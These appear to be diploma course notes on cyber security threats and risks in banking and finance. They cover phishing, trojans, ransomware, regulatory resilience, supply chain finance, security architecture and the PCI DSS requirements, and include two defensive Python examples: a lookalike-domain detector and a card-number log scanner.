PATHWAY TO QUALIFI LEVEL 4 DIPLOMA IN CYBER SECURITY
Unit code: 603/3331/5
Cyber Security Threats and Risks: Banking and Finance
Unit Reference : CSEC06
1.1: Analyze how threats and risks to traditional banking and finance platforms and emerging financial impact internal business resilience.
Definition:
• Cyber Security is “the security of information and its communicating channels as applied to computing devices such as computers and smartphones, as well as computer networks such as private and public networks, including the Internet as a whole.”
• The field covers all the processes and mechanisms by which computer-based equipment, information and services are protected from unintended or unauthorized access, change or destruction.
• Computer security also includes protection from unplanned events and natural disasters.
• Cyber security is a complex issue that cuts across multiple domains and calls for multidimensional, multilayered initiatives and responses.
• The arrangement of technologies, protocols, and methods referred to as "cyber security" is meant to guard against attacks, damage, malware, viruses, hacking, data theft, and unauthorized access to networks, devices, programs, and data.
• Protecting the user's assets is the primary goal of cyber security in banking. As more people go cashless, more activities and transactions move online. People conduct transactions using digital payment methods like debit and credit cards, which must be protected by cyber security.
• The banking industry has made cyber security a high priority.
• Building credibility and trust is the cornerstone of banking, so cyber security becomes even more essential.
Here are five factors that demonstrate the significance of cyber security in the banking industry:
• Everyone looks to be going entirely cashless and using digital payment methods like debit and credit cards. In this case, ensuring that the required cyber security safeguards are in place to protect your privacy and data is critical.
• After data breaches, it could be difficult to trust financial institutions. That's a significant issue for banks. Data breaches caused by a shoddy cyber security solution may easily lead to their consumer base moving their business elsewhere.
• Most of the time, when a bank's data is compromised, you lose time and money. Recovery can be unpleasant and time-consuming: it would entail canceling cards, reviewing statements, and keeping a watchful lookout for issues.
• Inappropriate use of your private information might be very harmful. Your data is sensitive and could expose a lot of information that could be exploited against you, even if the cards are revoked and the fraud is swiftly dealt with.
• Banks need to be more cautious than most other firms. That is the price for banks to retain the kind of valuable personal data they do. If the bank's information is not safeguarded against risks from cybercrime, it could be compromised.
• Cybercrime has increased so much over the past several years that it is now considered one of the most significant hazards to the financial sector.
• Hackers have improved their technology and expertise, making it difficult for any bank to thwart attacks consistently.
The following are some dangers to a bank's cyber security:
• One of the most frequent problems with cyber security in the banking sector is phishing attacks. They can be used to enter a financial institution's network and conduct a more severe attack like an APT (Advanced Persistent Threat), which can have a disastrous effect on those organizations. In an APT, a user who is not permitted can access the system and use it while going unnoticed for a long time. Significant financial, data and reputational losses may result from this.
• The term "Trojan" is used to designate several dangerous tactics hackers use to cheat their way into secure data. Until it is installed on a computer, a Banker Trojan looks like trustworthy software. However, it is a malicious computer application created to access private data processed or kept by online banking systems. This kind of computer program has a backdoor that enables access to a computer from the outside.
• Around the globe, there were roughly 54,000 installation packages for mobile banking trojans in the first quarter of 2022, an increase of more than 53% compared to the same quarter last year. After declining for the first three quarters of 2021, the number of trojan packages targeting mobile banking increased in the fourth quarter.
• A cyber threat known as ransomware encrypts important data and prevents owners from accessing it until they pay a high cost or ransom. Since 90% of banking institutions have faced ransomware in the past year, it poses a severe threat to them.
• In addition to posing a threat to financial cyber security, ransomware also affects cryptocurrency. Due to their decentralized structure, cryptocurrencies allow fraudsters to break into trading systems and steal money.
Hackers use a clone site in this type of cyber attack. Posing as a financial website, they:
▪ Design a layout that resembles the original one in both appearance and functionality.
▪ Establish a domain with a modest modification in spelling or domain extension.
• The user is directed to this duplicate website via a third-party messaging service, such as text or email.
• Hackers can capture a user's login information when the person is not paying attention.
Seamless multi-factor authentication can solve a lot of these issues.
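A defensive check for the clone-site attack described above, written as an added example that is not part of the course notes: given the domains an institution actually owns, it flags domains seen in inbound links that imitate them by misspelling, a swapped extension, look-alike characters, or the brand embedded in a longer name. All domain names in it are constructed placeholders, and the suffix splitting is a deliberate simplification of the Public Suffix List.

```python
"""Lookalike-domain check for clone-site (website spoofing) detection.

Added example, not part of the course notes. Given the domains an
institution actually owns, it classifies a domain seen in an inbound link
as legitimate, a lookalike (misspelling, swapped extension, look-alike
characters, or the brand embedded in a longer name) or unrelated. All
domain names below are constructed placeholders.
"""
from __future__ import annotations

# Constructed: domains the institution owns (placeholders, not a real bank).
LEGIT_DOMAINS = ["examplebank.com", "examplebank.co.uk"]

# Character substitutions commonly used to imitate a brand name.
HOMOGLYPHS = {"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "vv": "w", "rn": "m"}


def split_domain(domain: str) -> tuple[str, str]:
    """Split 'login.examplebank.co.uk' into ('examplebank', 'co.uk').

    Simplification (assumption): a trailing 'co.uk'/'com.au'-style pair is
    treated as the suffix, otherwise the last label is. A deployment would
    use the Public Suffix List instead.
    """
    labels = domain.lower().strip(".").split(".")
    if len(labels) < 2:
        return labels[0], ""
    second_level = {"co", "com", "org", "gov", "ac"}
    if len(labels) >= 3 and labels[-2] in second_level and len(labels[-1]) == 2:
        return labels[-3], ".".join(labels[-2:])
    return labels[-2], labels[-1]


def normalize(name: str) -> str:
    """Fold look-alike characters so 'examp1ebank' compares as 'examplebank'.

    Both the legitimate and the suspect name are folded the same way, so a
    brand that genuinely contains 'rn' or a digit still compares correctly.
    """
    for fake, real in HOMOGLYPHS.items():
        name = name.replace(fake, real)
    return name


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance (insertions, deletions, substitutions)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(domain: str, legit: list[str] = LEGIT_DOMAINS) -> str:
    """Return 'legitimate', 'lookalike:<reason>' or 'unrelated'."""
    d = domain.lower()
    if d in legit or any(d.endswith("." + owned) for owned in legit):
        return "legitimate"
    name, suffix = split_domain(d)
    folded = normalize(name)
    for owned in legit:
        owned_name, owned_suffix = split_domain(owned)
        owned_folded = normalize(owned_name)
        if folded == owned_folded and suffix != owned_suffix:
            return "lookalike:tld-swap"          # e.g. examplebank.net
        if folded == owned_folded:
            return "lookalike:homoglyph"         # e.g. examp1ebank.com
        if len(owned_folded) >= 6 and edit_distance(folded, owned_folded) <= 2:
            return "lookalike:misspelling"       # e.g. exampelbank.com
        if owned_folded in folded:
            return "lookalike:brand-embedded"    # e.g. examplebank-secure.com
    return "unrelated"


# Constructed sample of domains extracted from inbound messages.
SAMPLE_DOMAINS = [
    "login.examplebank.com",
    "examp1ebank.com",
    "examplebank.net",
    "exampelbank.com",
    "examplebank-secure.com",
    "unrelated-site.example",
]


def scan(domains: list[str]) -> dict[str, str]:
    """Classify every domain; any 'lookalike:' verdict warrants a blocklist or takedown review."""
    return {d: classify(d) for d in domains}


if __name__ == "__main__":
    for domain, verdict in scan(SAMPLE_DOMAINS).items():
        print(f"{domain:26} {verdict}")
```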
• Through increased online and mobile options that offer immediate and easy access, Gen-Z is shaping the future of banking. This poses a challenge to traditional banking, where you need to be quick to market, providing solutions across your organization to address business problems efficiently.
• Embrace innovation in your institution by leveraging technology to maximize existing processes and procedures. Invest in digital engagement tools to ensure long-lasting relationships with customers. Remember that consumers will gravitate towards institutions that are the easiest to work with and have deployed user-friendly and adaptable technologies.
• The rise of Fintechs poses another challenge to traditional banking. These revolutionary start-ups have gained significant traction by evaluating customer demands and responding with tailored products and resources. Consumers prefer to do business with those that make their lives easier with user-friendly technologies.
• Look at Fintechs as potential partners rather than competitors. Embracing this technology will improve your customer retention and attract new customers as well. Collaborating (rather than competing) will provide you the opportunity to capitalize on cutting-edge technology that will meet tech-savvy users' demands. Through a partnership, your institution can significantly reduce structural costs and give employees more time for building relationships.
• Access to increased banking technology means there is more opportunity for breaches and scams. However, institutions cannot eliminate all possible sources of cyber threats.
• Employ effective security tools, or the right partner, to limit the vulnerability of entry points to potential attacks. Leverage solutions that address advanced analytics, real-time monitoring, AI, and identity verification.
• More and more applications are being written with cloud-based technology. Implementing cloud technology provides for the elimination of on-premise hardware and software, allowing you to focus on banking. It also gives financial institutions a seamless path to disaster recovery. Self-service technology such as chatbots can assist banks with customer service in this new environment.
• Embrace technologies such as Alexa or Google Assistant that are starting to act as virtual banking concierges. This means your customers will use smart devices to access their financial information where you were once the main source. Embracing cloud technologies will free up resources, allowing you to focus on your main business: banking.
• Regulatory compliance has become the most prominent industry challenge due to the steep increase in regulatory requirements. It is no secret that compliance can significantly strain resources, often involving time-consuming processes that require you to compile and analyze data from divergent sources.
• Create a culture of handling compliance through technology that collects and mines data, performs in-depth data analysis, and provides insightful reporting. This is crucial for identifying and minimizing compliance risk. Take an inventory of your product mix to determine that you have the right solutions in place.
• Cyber security threats are constantly evolving, and the banking sector must take action to protect itself. As new defenses blunt their latest attacks, hackers adapt by developing new tools and strategies to compromise security.
• The financial cyber security system is only as strong as its weakest link. It is critical to have a selection of cyber security tools and approaches available to protect your data and systems.
Cyber security tools include:
• Network monitoring is the continuous scanning of a network for signs of dangerous or intrusive behavior. It is frequently used together with other security solutions like firewalls, antivirus software, and IDS (Intrusion Detection Systems). The software allows for either manual or automatic network security monitoring.
• Application security safeguards applications that are essential to business operations. It has features like application allow-listing and code signing and could help you synchronize your security policies with file-sharing permissions and multi-factor authentication. The use of AI in cyber security will inevitably improve software security.
• Financial cyber security includes risk management, data integrity, security awareness training, and risk analysis.
• Essential elements of risk management include risk evaluationand the prevention of harm from those risks.
• Data security also addresses the security of sensitive information.
• Wide-area network (WAN) security helps avoid attacks on large systems. It upholds the rigid safety standards set by the industry for users to follow when taking cyber security steps to protect their devices.
• It continuously monitors all programs and performs security checks on users, servers, and the network.
• Security ratings are a good way to show that you are concerned about the organization's cyber security.
• They also demonstrate that you are following industry and regulatory best practices for IT security and making long-term decisions based on that knowledge.
• A cyber security framework may be beneficial.
• Opt for Ethical Hacking training to enhance your knowledge further.
• A cyber security framework provides a common language and set of standards for security leaders across countries and industries to understand their security postures and those of their vendors.
• With a framework, it becomes easier to define the processes and procedures your organization must take to assess, monitor, and mitigate cyber security risk.
• The NIST Cyber Security Framework was created to increase cooperation between the public and private sectors in recognizing, analyzing, and managing cyber risk.
• The NIST framework has emerged as the gold standard for evaluating cyber security maturity, detecting security weaknesses, and adhering to cyber security legislation even when compliance is optional.
• CBEST vulnerability testing methodology was developed by the UK Financial Authorities in collaboration with CREST (the Council for Registered Ethical Security Testers) and Digital Shadows.
• It is an intelligence-led testing framework. CBEST's official debut took place on June 10, 2013.
• CBEST leverages intelligence from reputable commercial and government sources to identify possible attackers for a specific financial institution. Then, it imitates these potential attackers' methods to see how successfully they can breach the institution's defenses. This enables a company to identify the weak points in its system and create and implement corrective action plans.
3. Cyber Security and Privacy Framework for Privately Held Information Systems (the CIPHER Framework)
• Computer systems that organizations, both public and private, control and that hold personal data gathered from their clients are referred to as PHISs (Privately Held Information Systems).
• The CIPHER framework addresses electronic systems, kinds of digital information, and methods for data sharing, processing, and upkeep (not paper documents).
• The CIPHER methodological framework's primary goal is to suggest procedures and best practices for protecting privately held information systems (PHISs) online.
The following are the main features of the CIPHER methodological framework:
• Technology independence (versatility) refers to the ability to be used by any organization functioning in any field, even as existing technologies age or are replaced by newer ones.
• User-centricity - PHIS owners, developers, and citizens are the three primary user groups on which this approach focuses.
• Practicality - outlines possible precautions and controls to improve or verify whether the organization is safeguarding data from online dangers.
• Simplicity - it is simple to use and doesn't require specialized knowledge from businesses or individuals.
• The general public's understanding of cyber security has been relatively low, and few businesses have significantly invested in raising that awareness.
• Due to the low priority given to cyber security, it frequently receives short budgetary shrift. Cyber security continues to receive little attention from top management, and programs that support it are accorded low priority. This may be because management has underestimated how serious these risks are.
• The core component of cyber security has always been identity and access management, especially now that attackers might gain access to a business network with just one compromised login. Although there has been a little progress in this area, much work still needs to be done.
• Recent computer attacks have brought our attention to the growing threat of ransomware. Cybercriminals are beginning to employ various techniques to avoid being identified by endpoint protection code that concentrates on executable files.
• The majority of banking organizations now conduct business primarily through mobile devices. Every day the user base grows, making it an attractive target for attackers. Due to increased mobile phone transactions, mobile phones have become a desirable target for hackers.
• Hackers have increased their exploitation as a result of social media adoption. Customers that are less knowledgeable expose their data to the public, which the attackers abuse.
• The financial sector faces significant exposure to cyber risk given that it is information technology-intensive and highly interconnected through payment systems.
• Therefore, it is important for financial firms to strengthen their cyber resilience, which is defined by the Financial Stability Board (FSB) as "the ability of an organization to continue to carry out its mission by anticipating and adapting to cyber threats and other relevant changes in the environment and by withstanding, containing and rapidly recovering from cyber incidents."
• Within the financial sector, banks typically have the most public-facing products and services.
• Bank systems have multiple points of contact with outside parties, which can mean significant vulnerability to cyber attacks, with those interfaces being used as entry points for attacks targeting other parts of the financial system.
• Bank supervisory authorities have established regulatory and supervisory frameworks to enhance banks' cyber resilience.
• Regulators expect banks to address cyber risk either in their risk management and/or information security frameworks or in their specific cyber security strategies. The latter include requirements related to governance and oversight; risk ownership and accountability; information security; periodic evaluation and monitoring of cyber security controls; incident response; business continuity; and recovery planning.
• Supervisors assess banks' cyber security controls and their monitoring and surveillance of emerging threats. These assessments are based on banks' adherence to existing industry standards.
• Supervisory assessments also include challenges to bank approaches to testing controls and the remediation of issues identified.
• Challenges can include the review of control testing reports, which may be part of a more formal testing program. Such a program could employ various testing methodologies and practices, such as vulnerability assessment, penetration testing and red team testing.
• Regulators expect banks to establish a framework for incident response and recovery that may include cyber-specific business continuity and disaster recovery requirements. The seven components are:
• Governance
• Planning and preparation
• Analysis
• Mitigation
• Restoration and recovery
• Coordination and communication
• Improvement
• Regulators expect banks to account for business continuity and information confidentiality and integrity when dealing with third parties. Business continuity plans of critical third-party providers should align with the needs and policies of the bank.
• Confidentiality and integrity of information, on the other hand, are addressed in general data protection requirements and specific security requirements for safeguarding bank and customer information.
• Regulatory requirements for use of the cloud by banks may also apply. These include specific requirements on data location, data segregation, data use limitations, data security and treatment of data in the event of termination of a third-party arrangement.
• Supervision of third-party dependencies relies on the ability of the authority to supervise these firms directly.
• When supervisors do not have oversight of third parties, one possible approach is to place the onus on banks to ensure that the third parties have the same security policies, procedures and controls that are expected of regulated firms.
• Another approach is to require service level agreements between banks and third parties to include a clause that allows supervisors to examine the latter's systems. In contrast, when supervisors have oversight of third parties, they may opt to assess for themselves the soundness of their cyber security, particularly for those that provide the most critical services.
There are five types of cyber security information sharing arrangement:
• Sharing among banks
• Sharing by banks with regulators
• Sharing among regulators
• Sharing by regulators with banks
• Sharing with security agencies
The kind of information shared varies by type of information-sharing arrangement. For example, information related to cyber incidents is more widely observed in sharing by banks with regulators and with security agencies, whereas cyber threat-related information is the most common kind of information shared among banks.
• Supervisors are still developing metrics for measuring the quality of banks' cyber resilience.
• Early metrics have focused on using information from reported incidents, surveys, testing activities and on-site inspections. There is recognition of the need to develop more forward-looking cyber resilience metrics.
2.1: Explain how the financial supply chains for fast-growth medium to large organizations work in financial services.
2.2: Discuss how architectural structure relates to cyber security planning considerations.
• Financial markets comprise five key components: the debt market, the equity market, the foreign-exchange market, the mortgage market, and the derivative market.
• The Global Financial Architecture (GFA) is the "collective governance arrangements at the international level for safeguarding the effective functioning of the global monetary and financial systems" (Elson 2010: 17).
• A financial system consists of individuals like borrowers and lenders and institutions like banks, stock exchanges, and insurance companies actively involved in the transfer of funds and assets. It gives investors the ability to grow their wealth and assets, thus contributing to economic development.
• Most often, banking systems use a service-oriented architecture (SOA), which refers to the frameworks and processes that enable banking application functionalities to be provided as sets of services relevant to specific business functions.
• The post-Asian crisis GFA is characterized by a more structured system than ever before.
Arner and Buckley (2010: 201-202) argue that the contemporary GFA has four structural characteristics:
• First, a global consensus on what sound financial and regulatory systems should look like.
• Second, the creation of sound principles and practices by technocratic institutions such as Basel Committee on Banking Supervision.
• Third, the use of markets to incentivize the use of sound principles.
• Finally, the promotion of sound principles by multilateral institutions such as the IMF, an example being conditional loans which encourage structural adjustment.
• Supply chain finance (or 'supplier finance') is a type of cash advance. Similar to invoice finance, it's based on the credit rating of companies in the supply chain.
• It's a way for smaller businesses to benefit from the higher credit scores of their buyers and for buyers to lengthen their payment terms.
• Large multinational companies are highly likely to honor invoices from suppliers. That means the suppliers that work with them can get 100% of the value advanced from a lender, minus a small fee, once the buyer has approved the invoice for payment, because at this stage the risk of non-payment is low.
• Supply chain finance involves a shared arrangement between exporters and importers engaged in international trade. Financial institutions offer it to enable both parties to manage their invoice payment terms, maintain liquidity and keep money flowing freely through their supply chains.
• The complete business process includes the procure-to-pay cycle, working capital management, and the order-to-cash cycle. The overarching purpose of FSCM (Financial Supply Chain Management) is to achieve and maintain visibility into all of these activities so that your supply chain may be as efficient as possible while capitalizing on cost savings.
• The supplier issues an invoice to the buyer.
• The buyer confirms to the lender that the invoice has been approved for payment.
• The supplier gets the value straight away (minus a small fee).
• When payment is due, the buyer pays the lender.
• In this way, the supplier's cash flow is stabilized because they get paid within a few days, rather than waiting for the expected payment due date (which could be as long as 120 days).
• Meanwhile, the buyer simultaneously benefits because they have effectively extended their payment terms without negatively impacting their suppliers. After all, since the lender absorbs the payment delay, the supplier gets paid within a few days, and the buyer's working capital is untouched until their extended payment terms are over.
• Increases Profit Leverage – Firms value supply chain managers because they help control and reduce supply chain costs. This can result in dramatic increases in firm profits.
• Stability - With the early payment of invoices, Suppliers are more likely to withstand financial pressures that could limit their ability to deliver quality goods or services on time.
• Reduced costs - Suppliers have flexible control over their working capital, controlling when and how many of their invoices need to be funded. The Buyer can also benefit from extended payment terms to help manage cash flow.
• Inexpensive credit – Small and medium-sized enterprises (SMEs) are more likely to be refused a loan from a bank or financial institution. Supply chain finance is not classified as a standard loan, so it can be an efficient way for business owners to obtain short-term credit without much risk.
• Speed - Supply chain finance is often quicker to arrange than a loan because it depends on fewer criteria.
• Risk - Businesses must put up collateral when arranging a bank loan but this isn’t necessarily so with supply chain finance. Therefore, companies are at a higher risk of insolvency by stretching themselves financially.
• Reduction in profit - Supply chain finance fees can reduce a company’s profit margins, so they must be considered before the arrangement is made.
• A cyber security architecture is the foundation of an organization's defense against cyber threats, and ensures that all components of its IT infrastructure are protected.
• Environments that are secured by a cyber security architecture include cloud environments and networks.
• A cyber security framework is one component of a system's overall architecture.
• A complete product or system is created and constructed around it. Security architecture is a framework for determining how your company's security controls and countermeasures fit into the broader system structure.
• Preserving your critical systems' quality attributes, such as confidentiality, integrity, and availability, is the primary goal of these controls. In addition, it is the synergy of hardware and software understanding, together with programming expertise, research abilities, and policy formation.
• The strength of an organization's structure is critical to its success. It would help if you had a thorough company strategy, well-trained workers, and essential executives with relevant business expertise to succeed. To build a good cyber security team, you must have the qualities above: consistency, dedication, and focus on the task.
• To secure your firm from external attacks, you must ensure that your organization's cyber security architecture is airtight. Cyber-attacks and cyber security architecture breaches happen in a variety of shapes and sizes. As a result, it's critical that a company like yours maintains a high level of security awareness and is well-versed in defensive methods and tactics.
• Numerous dangers might befall your company if you don't have reasonable security measures.
• Someone good at anticipating and preventing cyber threats is known as a security architect. A cyber security architecture plan can help you implement and monitor your company's network security systems, which are vulnerable to cyber attacks. Using a Microsoft cyber security reference architecture framework, you can see how your security measures relate to the more extensive system architecture with respect to hostile actors.
• Antivirus, firewalls, and intrusion detection systems are essential in defending your business from external threats. Your organization should develop a complete security architecture incorporating these many parts for your networks, to maintain and optimize these security technologies and the existing, working rules and processes.
• Protecting an organization's resources and other critical information is the goal of this approach. Data flow is crucial to the overall success of a cyber security framework. Everyone in your firm must adhere to the security architecture's foundation and practices.
• Modern technology necessitates an organization's use of a cyber security reference architecture framework to safeguard critical data. This dramatically minimizes the risk of an attacker successfully gaining access to an organization's network infrastructure. With security architecture, a firm may create a risk-free environment while adhering to the most current security standards and business requirements.
• This is only one of the numerous advantages of this approach. Organizations may show their integrity and secrecy to prospective partners with the aid of security architecture. Confidentiality, Integrity, and Accessibility are the foundations of a solid security architecture. This will make it much easier for customers and partners to conduct business with and trust a company.
• The cost of failing to prevent cyber attacks is high. Security breaches may have a wide range of effects, from product recalls and humiliating news conferences to reputational harm and severe financial losses. When a mistake is not discovered early in the coding process, the cost of repairing it might rise by as much as 300 per cent.
• Post-release or production-stage detection of the same problem might result in a cost increase of up to 3,000 per cent. Security should be included at every manufacturing stage to help prevent or lessen the likelihood of mistakes being introduced throughout the product development process. All products should be created with security in mind to reduce the risk of zero-day attacks and hurried (and consequently costly) updates.
• It is widely accepted that the more an organization strives to minimize risks and decrease vulnerabilities, the more likely it is to have a positive result if it is the victim of a cyber-attack. Punitive actions, which may further harm a company's image and finances, can be avoided by adhering to rules.
• Businesses are attempting to ensure that their technology complies with GDPR laws, which have become more stringent since their inception. On the other hand, the legislative environment is working hard to keep up with the rapid advancement of technology. In other words, the rules and procedures of both sides of the equation are continually being revised and tightened.
Elements of the network
• A network node is a device that connects to other devices on the network, such as computers and gateways. Networks use several different protocols to communicate, such as TCP/IP, HTTP, HTTPS, IMAP, and FTP. Protocols are used to connect nodes on a network. Point-to-point, chain, circular, and hybrid node topologies are all examples of network topology.
• There are many types of cyber security equipment, including intrusion detection systems, firewalls, encryption and decryption devices, and more. Antivirus, spyware, and antimalware software are all included in this package. Network protocols such as IMAP and TCP/IP are protected by encryption and other techniques like HTTPS and FTTP.
• End-to-end encryption, blockchain, and zero-knowledge privacy techniques are some of the best methods for securing data.
• The ISO/IEC 27000 series and the NIST Risk Management Framework (SP 800-37) are two examples of architectural cyber security framework standards.
• Cyber security architectures are subject to a set of technical guidelines.
• In your firm, these are the security rules and procedures addressed and implemented. This forum believes an ideal cyber security architecture should be specified and simulatable in an industry-standard architecture modeling language (e.g., SysML, UML2). Even though we've just scratched the surface of cyber security architecture, you must grasp the fundamental steps involved. Listed below are the actions of the security architecture framework and process:
Assessment of Architectural Risks
• Vital business assets, hazards, and the effects of security threats and vulnerabilities are examined. Security services design and architecture are crafted to help you meet your business risk exposure objectives and goals when it comes to protecting your company's assets.
Implementation
• The enterprise cyber security architecture is designed to guarantee that security rules and policies, security architecture choices, and risk assessments are implemented and effective.
• It is used to monitor, supervise and control the operational condition, as well as to assess the influence of the system's security via threat and vulnerability management.
• A company's primary network architecture, including sensitive data and critical applications, is wholly secured by cyber security architecture against any current or future threats and breaches.
• It is vital that you completely comprehend the numerous weaknesses in your system to swiftly and effectively provide a remedy.
• A cyber security architect is a perfect person to hire if you want to figure out where your system is vulnerable.
• Your sensitive data and critical applications will be adequately protected thanks to a cyber security architect's comprehensive examination of network topologies and cyber-attacks.
Security architecture's primary objectives are:
• Prevent cyber attacks wherever possible.
• Keep the attack surface small and unexposed, so that there is little for an attacker to discover and penetrate.
• Ensure that personal and sensitive data is encrypted at rest and protected in transit by end-to-end encryption.
• Deploy countermeasures such as moving-target defences to detect, mitigate and counteract the attacks that do get through.
https://www.scribd.com/read/498886046/CybersecurityThe-Beginner-s-Guide-A-comprehensive-guide-to-gettingstarted-in-cybersecurity
https://www.scribd.com/document/607018650/PracticalCybersecurity-Architecture
3.1: Assess vulnerabilities and good industry practices related to the payment card Industry.
3.2: Apply the PCI DSS standard to your local domain/organization.
• The PCI Security Standards Council (PCI SSC) is a global forum that brings together payments industry stakeholders to develop and drive adoption of data security standards and resources for safe payments worldwide.
• The Payment Card Industry Data Security Standard (PCI DSS) is a set of requirements intended to ensure that all companies that process, store, or transmit credit card information maintain a secure environment.
• A business or organization's PCI scope includes all people, processes, and technologies that "touch," interact with, or affect the security of cardholder data. With a proper understanding of PCI scope, you can ensure that your software products help you and your clients improve payment security.
• PCI DSS is a widely accepted set of policies and procedures intended to optimize the security of credit, debit and prepaid card transactions and to protect cardholders against misuse of their personal information.
• PCI scope is the part of your environment that must meet the 12 requirements of the PCI Data Security Standard (DSS): the combination of people, processes and technologies that interact with, or could otherwise affect the security of, cardholder data (CHD).
• In an effort to enhance payment card data security, the PCI Security Standards Council (SSC) provides comprehensive standards and supportingmaterials, which include specification frameworks, tools, measurements, and support resources to help organizations ensure the security of cardholder informationat all times.
• The PCI DSS is the cornerstone of the council, as it provides the necessary framework for developinga complete payment card data security process that encompasses prevention, detection, and appropriate reaction to security incidents.
Tools and Resources Available from PCI SSC:
• Self-Assessment Questionnaires to assist organizations in validatingtheir PCI DSS compliance.
• PIN Transaction Security (PTS) requirements for device vendors and manufacturers and a list of approved PIN transactiondevices.
• Payment Application Data Security Standard (PA-DSS) and a list of Validated Payment Applications to help software vendors and others develop secure payment applications. (PA-DSS has since been retired in favour of the PCI Software Security Framework; previously validated applications remain listed only until their validation expires.)
Public resources:
• Lists of Qualified Security Assessors (QSAs)
• Payment ApplicationQualified Security Assessors (PA-QSAs)
• Approved ScanningVendors (ASVs)
• Internal Security Assessor (ISA) education program
1. Install and Maintain a Firewall
• Firewalls block foreign or unknown entities from reaching private data and are usually the first line of defence against attackers (malicious or otherwise). They are required for PCI DSS compliance because of their effectiveness in preventing unauthorized access.
2. Do Not Use Vendor-Supplied Defaults
• Routers, modems, point-of-sale (POS) systems and other third-party products ship with default passwords and settings that are publicly documented, and too often businesses never change them. Compliance here means keeping an inventory of every device and piece of software that requires a password (or other access control) and applying basic hardening to each one, starting with changing the default password.
3. Protect Stored Cardholder Data
• The third requirement protects cardholder data at rest in two ways. Stored card data must be made unreadable with strong cryptography, and the data-encrypting keys must themselves be protected, for example encrypted under a key-encrypting key that is stored separately from the data. Regular scans for primary account numbers (PAN) are needed to confirm that no unencrypted PAN exists anywhere in the environment, and PAN should be masked (at most the first six and last four digits shown) wherever it is displayed.
4. Encrypt Transmission of Cardholder Data
• Cardholder data travels over many ordinary channels (to payment processors, from local stores to head office, and so on). It must be encrypted with strong cryptography whenever it crosses open or public networks, and PAN must never be sent to unknown destinations or through end-user messaging such as email or chat.
5. Protect Systems Against Malware
• Installing anti-virus software is good practice regardless of PCI DSS, but it is required on all devices that interact with or store PAN. The software must be kept patched and its signatures updated, and your POS provider should employ anti-malware measures where software cannot be installed directly.
6. Develop and Maintain Secure Systems and Applications
• Firewalls and anti-virus software need frequent updates, and it is good practice to keep every piece of software in the business current. Vendor updates include security patches for recently discovered vulnerabilities, which add another layer of protection. Timely patching is mandatory for all software on devices that interact with or store cardholder data.
7. Restrict Access by Business Need to Know
• Access to cardholder data is strictly "need to know". Staff, executives and third parties who do not need the data must not have access to it. The roles that do need it should be documented and reviewed regularly, as PCI DSS requires.
8. Assign a Unique ID to Each Person with Access
• Individuals who do have access to cardholder data must each have their own credentials. There must not be a single shared login to the encrypted data known to several employees. Unique IDs reduce exposure and make activity attributable, which speeds up the response if data is compromised.
9. Restrict Physical Access
• Cardholder data must be kept in a physically secure location. Both written or printed data and digitally stored data (for example on a hard drive) should be locked in a secure room, drawer or cabinet. Access should be limited, and every access to the sensitive data must be logged to remain compliant.
10. Track and Monitor All Access
• Every activity involving cardholder data and PAN requires a log entry. Perhaps the most common non-compliance finding is a lack of proper record keeping when sensitive data is accessed. Compliance requires documenting how data flows into the organization and how often access is needed, and logging software is required to keep those records accurate.
11. Regularly Test Security Systems and Processes
• The ten requirements above involve many software products, physical locations and people, any of which can malfunction, go out of date or suffer from human error. These risks are limited by fulfilling the PCI DSS requirement for regular vulnerability scans and penetration testing.
12. Maintain an Information Security Policy
• An inventory of the equipment, software and employees with access must be documented for compliance, along with the cardholder-data access logs. How information flows into the company, where it is stored and how it is used after the point of sale must all be documented as well.
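As an added example (not part of the original course material), the following Python script shows the kind of PAN discovery scan that requirement 3 calls for: it finds digit runs of card-number length in text, keeps only those that pass the Luhn mod-10 check so that timestamps and order numbers are ignored, and masks the matches to first six / last four. The log lines are constructed for the example, and the regular expression and mask layout are this example's own choices rather than anything PCI SSC publishes.

```python
import re

# Runs of 13-19 digits, optionally separated by single spaces or dashes,
# not adjacent to other digits. 13-19 is the length range of payment card PANs.
_CANDIDATE = re.compile(r"(?<![0-9])(?:[0-9][ -]?){12,18}[0-9](?![0-9])")


def luhn_ok(digits: str) -> bool:
    """True if the digit string passes the Luhn mod-10 check used by card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pan(digits: str) -> str:
    """Show at most the first six and last four digits (the PCI DSS display limit)."""
    return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]


def _normalize(match_text: str) -> str:
    """Strip the separators so the Luhn check sees only digits."""
    return re.sub(r"[ -]", "", match_text)


def find_pans(text: str) -> list:
    """Return (as_written, normalized_digits) for every Luhn-valid PAN candidate."""
    hits = []
    for m in _CANDIDATE.finditer(text):
        digits = _normalize(m.group(0))
        if luhn_ok(digits):
            hits.append((m.group(0), digits))
    return hits


def redact(text: str) -> str:
    """Replace every Luhn-valid PAN with its masked form; leave other digit runs alone."""
    def _sub(m):
        digits = _normalize(m.group(0))
        return mask_pan(digits) if luhn_ok(digits) else m.group(0)
    return _CANDIDATE.sub(_sub, text)


# Constructed sample: a POS application log that should never contain full PANs.
# 4111111111111111 and 5500000000000004 are public Luhn-valid test numbers;
# 4111111111111112 fails Luhn, and the session id is a timestamp, not a card.
SAMPLE_LOG = """\
2024-03-01T10:15:02 pos-07 sale approved pan=4111 1111 1111 1111 amount=42.10
2024-03-01T10:16:40 pos-07 sale declined pan=4111111111111112 amount=9.99
2024-03-01T10:17:05 pos-03 sale approved pan=5500-0000-0000-0004 amount=120.00
2024-03-01T10:18:00 pos-03 heartbeat session=20240301101800
"""

if __name__ == "__main__":
    for as_written, digits in find_pans(SAMPLE_LOG):
        print(f"unencrypted PAN found: {as_written!r} -> {mask_pan(digits)}")
    print(redact(SAMPLE_LOG))
```

Run over log directories, database exports and file shares, a scanner like this is the evidence that no unencrypted PAN is lying around; the Luhn filter keeps the false-positive rate low enough that every hit is worth investigating.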
• PCI compliance shows that your systems meet a recognized security baseline and that customers can trust you with their payment card data; trust leads to customer confidence and repeat business.
• PCI compliance improves your standing with acquirers and payment brands, exactly the partners your business needs.
• PCI compliance is an ongoing process that helps prevent security breaches and payment card data theft now and in the future; being compliant means contributing to a global payment card data security solution.
